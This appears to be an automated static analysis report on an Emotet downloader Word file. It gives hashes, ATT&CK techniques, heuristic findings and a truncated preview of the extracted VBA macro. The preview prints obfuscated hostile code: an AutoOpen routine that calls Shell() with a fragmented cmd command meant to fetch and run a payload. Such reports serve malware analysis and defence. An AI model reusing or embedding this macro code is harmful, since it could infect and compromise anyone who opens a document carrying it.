Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c932d54a9ef3c645…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 120.5 KB
Created: 2018-06-04 19:41:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 124d03b86227bbf282f0f567ae11858e
SHA-1: 9f6325ebce797b5ceec1bbf32e61aec8fbe8b650
SHA-256: c932d54a9ef3c645a28b7d8de9747fc6c06fc23c6d65c036da4eae4d778a81db
Risk score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7339642-0'. Static analysis revealed a VBA macro with an AutoOpen function that calls Shell(). Shell() is used to execute a command, most likely to download and run a second-stage payload, which is characteristic of Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-7339642-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7339642-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18104 bytes
SHA-256: c95a657598105e0a38b59ce3511d99c688fe1e0dc40faefaf0b8447dd7fa30d9

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ipJnaIXAYRam"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ktvWqGIZcib()
On Error Resume Next
For aYoEIp = KWJmm To 73675
         CjnciK = (XDMOYN - ChrW(32283 * 4926) * kEmjLH * CInt(RCHlf + Sqr(13389)) + 21675 - 35437 / 48291 - CDate(AjNFka - 55179 + 27390 - Hex(Ubpkb / 91831)) + (bZiAD * Tan(vSVaXY)))
Next
For Qsupw = kooAi To 19219
         ImpcR = (qYfljY - ChrW(48156 * 27607) * vkJCEM * CInt(chzoOL + Sqr(36201)) + 74234 - 48293 / 7838 - CDate(idJctI - 83995 + 65433 - Hex(kGKQXw / 98466)) + (EqbFIV * Tan(HcdQi)))
Next
ktvWqGIZcib = GEuCvJPUG + Shell(rcnYYs + Chr(sUYww + vbKeyC + fHSacpXD) + YwInIaCpkSV + jCBOJimKH + hwUCtSTSdOY + cvjTfa + ziTjFFKE + JtiThN + jjoFmuCf, IzaIZz + 0 + Mornb)
For sMfiq = bSqALW To 67593
         WXiRP = (Zhick - ChrW(49589 * 14363) * VRfaDY * CInt(tihjNX + Sqr(52585)) + 27057 - 80624 / 30994 - CDate(ZTnktM - 2463 + 34903 - Hex(KiDwRd / 54185)) + (ZVkSKK * Tan(tAlBoz)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For sMBAn = lXSZl To 85260
         ObjOkv = (oUfQOI - ChrW(20586 * 82665) * bzdirl * CInt(wQpQLB + Sqr(4968)) + 21067 - 64786 / 35529 - CDate(OSRWRt - 37523 + 59801 - Hex(jlmiB / 88729)) + (rZHKpd * Tan(nwufSn)))
Next
ktvWqGIZcib
For Uiviw = bFikO To 23014
         JLiKP = (VLkZI - ChrW(77933 * 70946) * iXWOBr * CInt(MCqAE + Sqr(40777)) + 8424 - 73298 / 84147 - CDate(vdPab - 38746 + 69085 - Hex(ARGjI / 76123)) + (LrwhLV * Tan(UHzIn)))
Next
End Sub


Attribute VB_Name = "LwRZtBMK"
Function YwInIaCpkSV()
On Error Resume Next
For Mddmm = qGQlT To 94448
         JORjX = (qNpJBV - ChrW(95975 * 6527) * jMYRwM * CInt(AQMDJz + Sqr(11876)) + 55055 - 27066 / 2497 - CDate(WTvVK - 26557 + 30288 - Hex(zWUbQ / 78073)) + (HXDMC * Tan(BTOAW)))
Next
NdYqCWAjR = "md BcGtnW" + "EioCVEM lKkOETA" + "LpfZG" + "ZfiwTsEkvmr" + "HnUz LZBKFRW" + "ZwF &     %^c^o" + "^m^S^p^E^c" + "^%     %^c^o" + "^m^S^p^E^c^" + "%     /V      "
For mrHNv = RbjoO To 5405
         BbMTf = (vPwsjZ - ChrW(3408 * 97406) * VAhVn * CInt(ddsJZb + Sqr(98927)) + 25771 - 56476 / 36134 - CDate(ABBZp - 98982 + 67054 - Hex(aEqzY / 77125)) + (BNGjHt * Tan(QYzUK)))
Next
nOqnGif = "   /c    " + "       set %uo" + "pnaU" + "hzED" + "FEBLH%=qYsGRwC" + "o&&set %PZflvBR" + "%=p" + "&&set" + " %aw"
For NwBSZ = YAzifA To 96426
         MqniT = (fZmHu - ChrW(22278 * 28475) * kdbUoc * CInt(iCXZwP + Sqr(86320)) + 8665 - 66243 / 50471 - CDate(JjDalS - 2040 + 79288 - Hex(oKuYNL / 75717)) + (UDLLV * Tan(hoPEV)))
Next
IfItQDKiwMY = "ozRZMKwpdapL%" + "=o^w&&se" + "t %" + "dG" + "XwUhIJzOwP" + "vIL" + "%=aqPuRGX" + "qCw&&set %uRcb"
For mUDhL = fiKrI To 38037
         BIUHwM = (cdkfPW - ChrW(75318 * 43551) * lVOfj * CInt(TGNNLj + Sqr(10073)) + 10040 - 54601 / 90128 - CDate(MUENjQ - 85749 + 66787 - Hex(JkYRpP / 16416)) + (YWunQ * Tan(oNulB)))
Next
LticYSqvY = "MkiXY" + "FU%=!%PZflv" + "BR%!&&se" + "t %bwjrovmAJUz" + "kdWu%=FnMsLi"
For WXHkX = SSHFE To 41374
         FijhvX = (YsjFAD - ChrW(92189 * 14470) * zmfrc * CInt(lcoti + Sqr(93858)) + 81525 - 10078 / 38103 - CDate(YqKiF - 61261 + 97118 - Hex(FhirB / 68742)) + (OLCHS * Tan(dUzsG)))
Next
tiOKNkbQ = "NV" + "jbi" + "IXX&&set %" + "VX" + "sVrCz%=e^r&&set"
For BszhnM = bMlYKT To 76864
         mubub = (ZQloz - ChrW(2279 * 85567) * WKqzmw * CInt(GArfN + Sqr(15877)) + 15312 - 55065 / 73407 - CDate(niHrZX - 96197 + 59798 - Hex(ccNtpL / 91451)) + (qaiKhr * Tan(jukPNw)))
Next
JGwVnvXsY = " %fjY" + "RtGu" + "jOz%=!%awozR" + "ZMK" + "wpdapL%!&&se" + "t %XUpM"
For ozvJW = DwnsUz To 38874
         sGBTSb = (BDhGn - ChrW(22442 * 22052) * niRsLo * CInt(zjoLd + Sqr(87015)) + 75916 - 81727 / 81898 - CDate(XDnniv - 90574 + 39928 - Hex(mwOCjY / 84417)) + (AJCFJ * Tan(fJViH)))
Next
NvDFpFNG = "bfY%=s&&set %i" + "juWGJcI" + "ZDduwqZ%=NtzVBk" + "dKmtkLL" + "&&set %XFPfUwGw" + "P%=he&&se" + "t %WjC" + "MOLDYKNDfas%=" + "ll&&!%u
... (truncated)